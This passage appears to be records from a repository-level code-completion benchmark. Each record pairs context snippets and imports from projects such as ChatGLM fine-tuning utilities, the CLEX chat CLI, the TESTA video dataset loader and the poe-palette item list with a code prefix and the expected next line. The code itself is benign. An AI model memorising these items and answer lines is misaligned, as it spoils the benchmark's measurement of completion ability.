history=history)\r\n metadata, content, history = self.parse_history_from_answers(a,history)\r\n b_ids = self.tokenizer.encode(self.tokenizer.encode(a),is_split_into_words=True)\r\n role_tokens = [ self.tokenizer.get_command(\"<|assistant|>\") ] + self.tokenizer.encode(f\"{metadata}\\n\")\r\n while len(a_ids) + len(b_ids) > max_seq_length - len(role_tokens) - 2:\r\n if len(b_ids) > len(a_ids):\r\n b_ids.pop(-1)\r\n else:\r\n a_ids.pop(0)\r\n assert len(b_ids) > 0\r\n b_ids += [ self.eos_token_id ]\r\n 
a_ids = a_ids + role_tokens\r\n input_ids = a_ids + b_ids\r\n labels = copy.deepcopy(input_ids) if not sup else [ -100 ] * len(a_ids) + copy.deepcopy(b_ids)\r\n input_ids = [self.bos_token_id] + input_ids\r\n labels = [self.bos_token_id] + labels if not sup else [ -100 ] + labels\r\n assert len(input_ids) <= max_seq_length\r\n ds.append(self.final(input_ids, labels, max_seq_length, tokenizer))\r\n\r\n return ds\r\n\r\n\r\n\r\n # def slidding(cls, tokenizer: ChatGLMTokenizer,config, messages,\r\n # max_seq_length,\r\n # sliding_size = None,\r\n # src_max_length=-1,\r\n # dst_max_length=-1,\r\n # sup=True):\r\n #\r\n #\r\n # if sliding_size is None or sliding_size < 0:\r\n # sliding_size = max_seq_length - 1\r\n #\r\n # assert sliding_size <= max_seq_length - 1\r\n #\r\n # ds = []\r\n #\r\n # for sid, (q, a) in enumerate(messages):\r\n # a_ids = tokenizer.encode(text=build_template(q,prefix=prefix, history=examples[:sid]), add_special_tokens=False)\r\n # b_ids = tokenizer.encode(text=a, add_special_tokens=False)\r\n # if src_max_length and src_max_length > 0:\r\n # a_ids = a_ids[:src_max_length]\r\n # if dst_max_length and dst_max_length > 0:\r\n # b_ids = b_ids[:dst_max_length]\r\n #\r\n # b_ids += [config.eos_token_id]\r\n # input_ids_qa = a_ids + b_ids\r\n # labels_all = copy.deepcopy(input_ids_qa) if not sup else [-100] * len(a_ids) + b_ids\r\n #\r\n # pos = 0\r\n # while pos < len(input_ids_qa):\r\n # input_ids = input_ids_qa[pos:pos + max_seq_length - len(sptoken)]\r\n # labels = labels_all[pos:pos + max_seq_length - len(sptoken)]\r\n #\r\n # pos += sliding_size\r\n # if np.all(np.asarray(labels) == -100):\r\n # continue\r\n #\r\n # input_ids = sptoken + input_ids\r\n # labels = sptoken + labels if not sup else [-100] * len(sptoken) + labels\r\n # ds.append(cls.final(input_ids,labels,max_seq_length,tokenizer))\r\n # return ds\r"
}
] | import copy
import glob
import json
import os
import typing
import numpy as np
import torch
from functools import cache
from deep_training.data_helper import DataHelper, ModelArguments, TrainingArguments, DataArguments, TrainingArgumentsHF, \
TrainingArgumentsCL, TrainingArgumentsAC
from fastdatasets.record import load_dataset as Loader, RECORD, WriterObject, gfile
from tqdm import tqdm
from transformers import HfArgumentParser
from data_processer import DataStrategy, TokenIdsMaker
from aigc_zoo.model_zoo.chatglm3.llm_model import ChatGLMTokenizer,PetlArguments,ChatGLMConfig
from config import *
| 2,312 | # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
    'strategy': DataStrategy.truncation, # data strategy option
DataStrategy.truncation: {
        'sup': True, # whether to use supervised training
},
DataStrategy.siding: {
        'sliding_size': train_info_args['max_seq_length'] // 3 * 2, # prompt sliding window size
        'sup': True, # whether to use supervised training
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
    # tokenize
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
    'strategy': DataStrategy.truncation, # data strategy option
DataStrategy.truncation: {
        'sup': True, # whether to use supervised training
},
DataStrategy.siding: {
        'sliding_size': train_info_args['max_seq_length'] // 3 * 2, # prompt sliding window size
        'sup': True, # whether to use supervised training
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
    # tokenize
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| self.tokens_ids_maker = TokenIdsMaker(tokenizer=tokenizer,config=config)
| 1 | 2023-10-27 09:15:00+00:00 | 4k |
DAMO-NLP-SG/CLEX | serve/cli.py | [
{
"identifier": "ChatIO",
"path": "serve/inference.py",
"snippet": "class ChatIO(abc.ABC):\n @abc.abstractmethod\n def prompt_for_input(self, role: str) -> str:\n \"\"\"Prompt for input from a role.\"\"\"\n\n @abc.abstractmethod\n def prompt_for_output(self, role: str):\n \"\"\"Prompt for output from a role.\"\"\"\n\n @abc.abstractmethod\n def stream_output(self, output_stream):\n \"\"\"Stream output.\"\"\"\n\n @abc.abstractmethod\n def print_output(self, text: str):\n \"\"\"Print output.\"\"\""
},
{
"identifier": "chat_loop",
"path": "serve/inference.py",
"snippet": "def chat_loop(\n model_path: str,\n device: str,\n num_gpus: int,\n max_gpu_memory: str,\n dtype: Optional[torch.dtype],\n load_8bit: bool,\n cpu_offloading: bool,\n conv_template: Optional[str],\n conv_system_msg: Optional[str],\n temperature: float,\n repetition_penalty: float,\n max_new_tokens: int,\n chatio: ChatIO,\n gptq_config: Optional[GptqConfig] = None,\n awq_config: Optional[AWQConfig] = None,\n exllama_config: Optional[ExllamaConfig] = None,\n revision: str = \"main\",\n judge_sent_end: bool = True,\n debug: bool = True,\n history: bool = True,\n log_scale: bool = True,\n):\n # Model\n config = AutoConfig.from_pretrained(\n model_path\n )\n config.log_scale = log_scale\n model, tokenizer = load_model(\n model_path,\n device=device,\n num_gpus=num_gpus,\n max_gpu_memory=max_gpu_memory,\n dtype=dtype,\n load_8bit=load_8bit,\n cpu_offloading=cpu_offloading,\n gptq_config=gptq_config,\n awq_config=awq_config,\n exllama_config=exllama_config,\n revision=revision,\n debug=debug,\n config=config\n )\n generate_stream_func = get_generate_stream_function(model, model_path)\n\n model_type = str(type(model)).lower()\n is_t5 = \"t5\" in model_type\n is_codet5p = \"codet5p\" in model_type\n\n # Hardcode T5's default repetition penalty to be 1.2\n if is_t5 and repetition_penalty == 1.0:\n repetition_penalty = 1.2\n\n # Set context length\n context_len = get_context_length(model.config)\n\n # Chat\n def new_chat():\n if conv_template:\n conv = get_conv_template(conv_template)\n else:\n conv = get_conversation_template(model_path)\n if conv_system_msg is not None:\n conv.set_system_message(conv_system_msg)\n return conv\n\n def reload_conv(conv):\n \"\"\"\n Reprints the conversation from the start.\n \"\"\"\n for message in conv.messages[conv.offset :]:\n chatio.prompt_for_output(message[0])\n chatio.print_output(message[1])\n\n conv = None\n\n while True:\n if not history or not conv:\n conv = new_chat()\n\n try:\n inp = chatio.prompt_for_input(conv.roles[0])\n except EOFError:\n inp = \"\"\n\n if inp == \"!!exit\" or not inp:\n print(\"exit...\")\n break\n elif inp == \"!!reset\":\n print(\"resetting...\")\n conv = new_chat()\n continue\n elif inp == \"!!remove\":\n print(\"removing last message...\")\n if len(conv.messages) > conv.offset:\n # Assistant\n if conv.messages[-1][0] == conv.roles[1]:\n conv.messages.pop()\n # User\n if conv.messages[-1][0] == conv.roles[0]:\n conv.messages.pop()\n reload_conv(conv)\n else:\n print(\"No messages to remove.\")\n continue\n elif inp == \"!!regen\":\n print(\"regenerating last message...\")\n if len(conv.messages) > conv.offset:\n # Assistant\n if conv.messages[-1][0] == conv.roles[1]:\n conv.messages.pop()\n # User\n if conv.messages[-1][0] == conv.roles[0]:\n reload_conv(conv)\n # Set inp to previous message\n inp = conv.messages.pop()[1]\n else:\n # Shouldn't happen in normal circumstances\n print(\"No user message to regenerate from.\")\n continue\n else:\n print(\"No messages to regenerate.\")\n continue\n elif inp.startswith(\"!!save\"):\n args = inp.split(\" \", 1)\n\n if len(args) != 2:\n print(\"usage: !!save <filename>\")\n continue\n else:\n filename = args[1]\n\n # Add .json if extension not present\n if not \".\" in filename:\n filename += \".json\"\n\n print(\"saving...\", filename)\n with open(filename, \"w\") as outfile:\n json.dump(conv.dict(), outfile)\n continue\n elif inp.startswith(\"!!load\"):\n args = inp.split(\" \", 1)\n\n if len(args) != 2:\n print(\"usage: !!load <filename>\")\n continue\n else:\n filename = 
args[1]\n\n # Check if file exists and add .json if needed\n if not os.path.exists(filename):\n if (not filename.endswith(\".json\")) and os.path.exists(\n filename + \".json\"\n ):\n filename += \".json\"\n else:\n print(\"file not found:\", filename)\n continue\n\n print(\"loading...\", filename)\n with open(filename, \"r\") as infile:\n new_conv = json.load(infile)\n\n conv = get_conv_template(new_conv[\"template_name\"])\n conv.set_system_message(new_conv[\"system_message\"])\n conv.messages = new_conv[\"messages\"]\n reload_conv(conv)\n continue\n\n conv.append_message(conv.roles[0], inp)\n conv.append_message(conv.roles[1], None)\n prompt = conv.get_prompt()\n\n if is_codet5p: # codet5p is a code completion model.\n prompt = inp\n\n gen_params = {\n \"model\": model_path,\n \"prompt\": prompt,\n \"temperature\": temperature,\n \"repetition_penalty\": repetition_penalty,\n \"max_new_tokens\": max_new_tokens,\n \"stop\": conv.stop_str,\n \"stop_token_ids\": conv.stop_token_ids,\n \"echo\": False,\n }\n\n try:\n chatio.prompt_for_output(conv.roles[1])\n output_stream = generate_stream_func(\n model,\n tokenizer,\n gen_params,\n device,\n context_len=context_len,\n judge_sent_end=judge_sent_end,\n )\n t = time.time()\n outputs = chatio.stream_output(output_stream)\n duration = time.time() - t\n conv.update_last_message(outputs.strip())\n\n if debug:\n num_tokens = len(tokenizer.encode(outputs))\n msg = {\n \"conv_template\": conv.name,\n \"prompt\": prompt,\n \"outputs\": outputs,\n \"speed (token/s)\": round(num_tokens / duration, 2),\n }\n print(f\"\\n{msg}\\n\")\n\n except KeyboardInterrupt:\n print(\"stopped generation.\")\n # If generation didn't finish\n if conv.messages[-1][1] is None:\n conv.messages.pop()\n # Remove last user message, so there isn't a double up\n if conv.messages[-1][0] == conv.roles[0]:\n conv.messages.pop()\n\n reload_conv(conv)"
}
] | import argparse
import os
import re
import sys
import torch
from prompt_toolkit import PromptSession
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from rich.console import Console
from rich.live import Live
from rich.markdown import Markdown
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.awq import AWQConfig
from fastchat.modules.exllama import ExllamaConfig
from fastchat.modules.gptq import GptqConfig
from serve.inference import ChatIO, chat_loop
from fastchat.utils import str_to_torch_dtype | 2,173 | """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| class SimpleChatIO(ChatIO): | 0 | 2023-10-25 05:30:25+00:00 | 4k |
RenShuhuai-Andy/TESTA | data/video_dataset.py | [
{
"identifier": "pre_caption",
"path": "data/utils.py",
"snippet": "def pre_caption(caption, max_words=50):\n caption = re.sub(\n r\"([!\\\"()*#~])\", #r\"([!\\\"()*#:;~])\" #r\"([.!\\\"()*#:;~])\",\n ' ',\n caption.lower(),\n )\n caption = re.sub(\n r\"\\s{2,}\",\n ' ', \n caption,\n )\n caption = caption.rstrip('\\n')\n caption = caption.strip(' ')\n\n # truncate caption\n caption_words = caption.split(' ')\n if len(caption_words) > max_words:\n caption = ' '.join(caption_words[:max_words])\n\n return caption"
},
{
"identifier": "pre_question",
"path": "data/utils.py",
"snippet": "def pre_question(question, max_ques_words=50):\n question = re.sub(\n r\"([.!\\\"()*#:;~])\",\n '',\n question.lower(),\n )\n question = question.rstrip(' ')\n\n # truncate question\n question_words = question.split(' ')\n if len(question_words) > max_ques_words:\n question = ' '.join(question_words[:max_ques_words])\n\n return question"
},
{
"identifier": "TemporalConsistentRandomAugment",
"path": "data/randaugment.py",
"snippet": "class TemporalConsistentRandomAugment(object):\n\n def __init__(self, N=2, M=10, p=0.0, tensor_in_tensor_out=True, augs=[]):\n self.N = N\n self.M = M\n self.p = p\n self.tensor_in_tensor_out = tensor_in_tensor_out\n if augs:\n self.augs = augs \n else:\n self.augs = list(arg_dict.keys())\n\n def get_random_ops(self):\n sampled_ops = np.random.choice(self.augs, self.N, replace=False)\n # return [(op, 0.5, self.M) for op in sampled_ops]\n return [(op, self.M) for op in sampled_ops]\n\n def __call__(self, frames):\n assert frames.shape[-1] == 3, 'Expecting last dimension for 3-channels RGB (b, h, w, c).'\n \n if self.tensor_in_tensor_out:\n frames = frames.numpy().astype(np.uint8)\n \n num_frames = frames.shape[0]\n\n ops = num_frames * [self.get_random_ops()]\n apply_or_not = num_frames * [np.random.random(size=self.N) > self.p]\n\n frames = torch.stack(list(map(self._aug, frames, ops, apply_or_not)), dim=0).float()\n\n return frames\n\n def _aug(self, img, ops, apply_or_not):\n for i, (name, level) in enumerate(ops):\n if not apply_or_not[i]:\n continue\n args = arg_dict[name](level)\n img = func_dict[name](img, *args) \n return torch.from_numpy(img)"
}
] | import logging
import copy
import math
import pickle
import torch
import numpy as np
import random
import decord
import json
import os
import random
import pandas as pd
import collections
from torch.utils.data import Dataset
from torchvision.datasets.utils import download_url
from PIL import Image
from decord import VideoReader
from data.utils import pre_caption, pre_question
from .randaugment import TemporalConsistentRandomAugment | 2,348 |
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
image_root (string): Root directory of video
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size)
|
decord.bridge.set_bridge("torch")
class VideoRandomSquareCrop(object):
def __init__(self, crop_size, p=0.5):
assert isinstance(crop_size, int)
self.crop_size = crop_size
self.p = p
def __call__(self, video):
"""
Args:
img (torch.tensor): video to be cropped.
Returns:
torch.tensor: cropped video.
"""
if isinstance(video, torch.Tensor):
if len(video.shape) == 4:
b, t, h, w = video.shape
else:
raise RuntimeError('Expecting 4-dimensional tensor of shape (b,t,h,w), got {}'.format(video.shape))
# if random.uniform(0, 1) < self.p:
# video = torch.flip(video, (3,))
x = random.randint(0, h - self.crop_size)
y = random.randint(0, w - self.crop_size)
return video[:, :, x: x + self.crop_size, y: y + self.crop_size]
else:
raise NotImplementedError('Support only torch.Tensor as input, got {}'.format(type(video)))
class ImageNorm(object):
"""Apply Normalization to Image Pixels on GPU
"""
def __init__(self, mean, std):
self.mean = torch.tensor(mean).view(1, 3, 1, 1)
self.std = torch.tensor(std).view(1, 3, 1, 1)
def __call__(self, img):
if torch.max(img) > 1 and self.mean.max() <= 1:
img.div_(255.)
return img.sub_(self.mean).div_(self.std)
def load_jsonl(filename):
with open(filename, "r") as f:
return [json.loads(l.strip("\n")) for l in f.readlines()]
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
elif frm_sampling_strategy == 'headtail':
frame_indices_head = sorted(random.sample(range(vlen // 2), num_frm // 2))
frame_indices_tail = sorted(random.sample(range(vlen // 2, vlen), num_frm // 2))
frame_indices = frame_indices_head + frame_indices_tail
else:
raise NotImplementedError('Invalid sampling strategy {} '.format(frm_sampling_strategy))
raw_sample_frms = vr.get_batch(frame_indices)
except Exception as e:
return None
raw_sample_frms = raw_sample_frms.permute(0, 3, 1, 2) # (N, H, W, C) to (N, C, H, W)
return raw_sample_frms
class VideoDataset(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=384,
video_fmt='.mp4'):
'''
video_root (string): Root directory of videos
ann_root (string): directory to store the annotation file
'''
url = 'https://storage.googleapis.com/sfr-vision-language-research/datasets/msrvtt_test.jsonl'
filename = 'msrvtt_test.jsonl'
download_url(url, ann_root)
self.annotation = load_jsonl(os.path.join(ann_root, filename))
print('number of instances: %s' % len(self.annotation))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_root = video_root
self.video_fmt = video_fmt
self.img_norm = ImageNorm(mean=(0.48145466, 0.4578275, 0.40821073), std=(0.26862954, 0.26130258, 0.27577711))
# self.text = [pre_caption(ann['caption'], 40) for ann in self.annotation]
self.txt2video = [i for i in range(len(self.annotation))]
self.video2txt = self.txt2video
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
video_path = os.path.join(self.video_root, ann['clip_name'] + self.video_fmt)
if not os.path.exists(video_path):
print('not exist %s' % video_path)
return
vid_frm_array = load_video_from_path_decord(video_path, self.frm_sampling_strategy, self.num_frm, height=self.max_img_size, width=self.max_img_size)
video = self.img_norm(vid_frm_array.float())
return video, ann['clip_name']
class caption_video(Dataset):
def __init__(self, video_root, ann_root, num_frm=4, frm_sampling_strategy="rand", max_img_size=224,
split='test', max_words=30, prompt='', video_resize=256, input_segments=False, input_asr=False,
asr_drop=0.0, seg_drop=0.0):
'''
video_root (string): Root directory of videos
ann_root (string): directory to store the annotation file
'''
filename = '%s.caption_coco_format.json' % split
with open(os.path.join(ann_root, filename), 'r') as f:
self.annotation = json.load(f)['annotations']
if split == 'train':
print('number of instances: %s in %s dataset' % (len(self.annotation), split))
self.num_frm = num_frm
self.frm_sampling_strategy = frm_sampling_strategy
self.max_img_size = max_img_size
self.video_resize = video_resize
self.video_random_cropper = VideoRandomSquareCrop(max_img_size) | self.video_rand_aug = TemporalConsistentRandomAugment(N=2, M=5, augs=['Identity', 'Contrast','Brightness','Sharpness', 'ShearX', 'ShearY', 'TranslateX', 'TranslateY', 'Rotate', 'HorizontalFlip']) | 2 | 2023-10-29 12:09:38+00:00 | 4k |
flbraun/poe-palette | data/wiki.py | [
{
"identifier": "League",
"path": "data/leagues.py",
"snippet": "class League:\n type_: LeagueType\n title: str # e.g. \"Ancestor\"\n slug: str # e.g. \"ancestor\"\n is_hardcore: bool"
},
{
"identifier": "NinjaCategory",
"path": "data/ninja.py",
"snippet": "class NinjaIndex:\n def match(self, item_name: str) -> NinjaCategory | None:\n def stats(self) -> dict[NinjaCategory, int]:\n def print_stats(self) -> None:\ndef get_ninja_index(league: League) -> NinjaIndex:\ndef make_ninja_url(league: League, item_name: str, base_name: str | None, category: NinjaCategory) -> URL | None:"
},
{
"identifier": "automake_trade_url",
"path": "data/trade.py",
"snippet": "def automake_trade_url(league: League, category: NinjaCategory, item_name: str, base_item: str | None = None) -> URL:\n # NinjaCategory is a good (but not perfect) indicator of whether an item is bulk tradable.\n if category in bulk_tradable_ninja_categories:\n if category in {\n NinjaCategory.MAPS,\n NinjaCategory.BLIGHTED_MAPS,\n NinjaCategory.BLIGHT_RAVAGED_MAPS,\n NinjaCategory.SCOURGED_MAPS,\n }:\n item_name = f'{item_name} Tier 16'\n return make_bulk_trade_url(league, item_name)\n\n if base_item:\n trade_type, trade_name = base_item, item_name\n else:\n trade_type, trade_name = item_name, None\n return make_trade_url(league, trade_type, name=trade_name)"
},
{
"identifier": "Rarity",
"path": "data/types.py",
"snippet": "class Rarity(Enum):\n NORMAL = 'normal'\n MAGIC = 'magic'\n RARE = 'rare'\n UNIQUE = 'unique'"
},
{
"identifier": "Entry",
"path": "data/utils.py",
"snippet": "class Entry:\n \"\"\"\n The final data container that serializes data for the\n electron app to consume.\n \"\"\"\n display_text: str\n wiki_url: URL | None = None\n poedb_url: URL | None = None\n ninja_url: URL | None = None\n trade_url: URL | None = None\n tft_url: URL | None = None\n tool_url: URL | None = None"
},
{
"identifier": "LoggedRequestsSession",
"path": "data/utils.py",
"snippet": "class LoggedRequestsSession(requests.Session):\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n\n self.hooks['response'].append(self.log_response_stats)\n\n @staticmethod\n def log_response_stats(r: requests.Session, *args, **kwargs) -> None:\n logger = logging.getLogger('http_request')\n logger.info(\n '%s %s %s %s',\n r.url,\n r.status_code,\n f'{int(r.elapsed.total_seconds() * 1000)}ms',\n humanize.naturalsize(len(r.content), binary=True).replace(' ', ''),\n )"
},
{
"identifier": "make_poedb_url",
"path": "data/utils.py",
"snippet": "def make_poedb_url(item_name: str) -> URL:\n item_name = item_name.replace(' ', '_').replace(\"'\", '')\n item_name = urllib.parse.quote(item_name)\n return f'https://poedb.tw/us/{item_name}'"
},
{
"identifier": "make_wiki_url",
"path": "data/utils.py",
"snippet": "def make_wiki_url(item_name: str) -> URL:\n item_name = item_name.replace(' ', '_')\n return f'https://www.poewiki.net/wiki/{item_name}'"
}
] | import http
import itertools
import pprint
from collections.abc import Generator
from tabulate import tabulate
from .leagues import League
from .ninja import NinjaCategory, get_ninja_index, make_ninja_url
from .trade import automake_trade_url
from .types import Rarity
from .utils import Entry, LoggedRequestsSession, make_poedb_url, make_wiki_url | 3,016 | 'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version of Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
